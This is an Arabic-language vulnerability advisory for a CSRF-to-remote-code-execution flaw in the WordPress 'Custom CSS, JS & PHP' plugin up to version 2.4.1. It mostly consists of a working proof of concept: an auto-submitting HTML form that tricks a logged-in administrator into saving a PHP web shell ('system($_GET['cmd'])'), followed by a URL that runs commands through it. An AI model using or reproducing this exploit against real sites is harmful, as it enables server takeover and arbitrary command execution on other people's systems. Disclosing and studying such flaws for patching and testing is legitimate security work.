
إضافة WordPress Custom CSS, JS & PHP <= 2.4.1 - ثغرة CSRF إلى RCE
ثغرة Cross-Site Request Forgery (CSRF) في إضافة WPFactory Custom CSS, JS & PHP تسمح بـ تنفيذ التعليمات البرمجية عن بُعد (RCE) عن طريق حقن كود PHP خبيث عبر طلبات POST غير مصرح بها.
يؤثر هذا على جميع الإصدارات حتى 2.4.1 وما يشملها.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:Hفيما يلي لقطة شاشة تعرض نتيجة استغلال ناجح، توضح كيفية تنفيذ التعليمات البرمجية عن بُعد عبر معامل URL:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded.http://target-site.com/?cmd=whoami
إثبات المفهوم هذا هو لأغراض تعليمية فقط.
المؤلف ليس مسؤولاً عن أي إساءة استخدام أو ضرر ناتج عن تطبيق هذه المعلومات بشكل غير صحيح.
اختبر دائمًا في بيئات محكومة وبإذن.
بواسطة: Nxploited | Khaled Alenazi